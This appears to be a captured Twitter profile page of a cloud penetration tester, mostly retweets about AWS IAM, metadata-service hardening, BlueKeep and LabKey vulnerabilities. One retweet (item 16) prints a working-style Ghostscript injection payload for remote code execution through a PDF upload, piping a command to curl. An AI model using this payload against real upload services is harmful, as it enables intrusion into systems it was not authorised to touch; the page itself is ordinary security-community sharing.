Spencer Gietzen

@SpenGietz

Wrote Pacu, cloud security researcher, Lead Cloud Pentester at Rhino Security Labs

Joined: April 2017

Tweets


  1. Pinned Tweet
    23 Oct 2019

    Got AWS keys in a pentest or through a bug bounty program? Check out these 28 AWS IAM privilege escalation methods I put together on GitHub

  2. Retweeted
    27 Nov 2019

    “Don’t roll your own IAM” is the modern day “Don’t roll your own crypto”

  3. Retweeted

    I've been heads-down on final re:Invent blogging, and need to catch up on all of the posts from the last couple of days. Unroll this thread to see them all..

  4. Retweeted
    22 Nov 2019

    Policy Sentry v0.5.5 released. Includes more AWS services and allows the user to query the IAM Permissions database directly from the CLI. If you've ever wasted time searching through the IAM docs with Ctrl+F, this new feature might be for you.

  5. Retweeted
    20 Nov 2019

    "who the HELL is in my Google Doc" I think furiously, before realizing it's me in a different tab

  6. Retweeted
    19 Nov 2019

    I’ve been laughing for 10 mins straight😭

  7. Retweeted
    19 Nov 2019

    Dang.. Our group chat is so boring you would rather talk to ANYONE else...

  8. Retweeted
    20 Nov 2019

    While I slept, released 88 new APIs. List overtook Get as #1 verb Most interesting: cloudtrail:GetInsightSelectors Runner up: ec2:EnableFastSnapshotRestores Longest: codecommit:BatchDisassociateApprovalRuleTemplateFromRepositories Busiest: quicksight (49 new!)

  9. Retweeted
    20 Nov 2019

    Such awesomeness on so many levels... ✅ Technical walkthrough of vulnerabilities/compromise ✅ Configuration recommendation(s) for proper monitoring & investigations ✅ Tooling to ingest and search through logs ✅ Threat Hunting query examples

  10. Retweeted
    20 Nov 2019
  11. Retweeted

    AWS joins GCP and Azure in protecting the instance metadata service, including additional session-based features that other cloud providers don't have

  12. Retweeted
  13. Retweeted
    19 Nov 2019

    From the blog: Add defense in depth against open firewalls, reverse proxies, and SSRF vulnerabilities with enhancements to the EC2 Instance Metadata Service

  14. Retweeted

    Check out part one of 's two-part series on the Capital One Breach! In this post, he walks through how to set up and complete the CloudGoat cloud_breach_s3 scenario.

  15. Retweeted
    13 Nov 2019

    In an effort to compete with Google's ongoing war on their own customers, has quietly rolled out a potentially breaking change to their Application Load Balancers. A thread.

  16. Retweeted
    7 Nov 2019

    RCE on PDF upload: Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf" Content-Type: application/pdf %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl ) ) .putdeviceparams quit

  17. Retweeted
    7 Nov 2019

    Some interesting new APIs for Single Sign On

  18. Retweeted

    It looks like a worm has finally arrived! Kevin kindly sent me a crash dump and after some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner.

  19. Retweeted

    Did you know you can use the Connection header to delete other headers? Interesting research lead by :

  20. Retweeted
    29 Oct 2019

    Wrote a post about some Vulnerabilities Leading to RCE in LabKey Server

  21. Retweeted

    Check out our latest blog post, a walkthrough of the 3 different vulnerabilities discovered by in the LabKey Server--stored XSS, CSRF leading to RCE, and XXE allowing arbitrary file read:
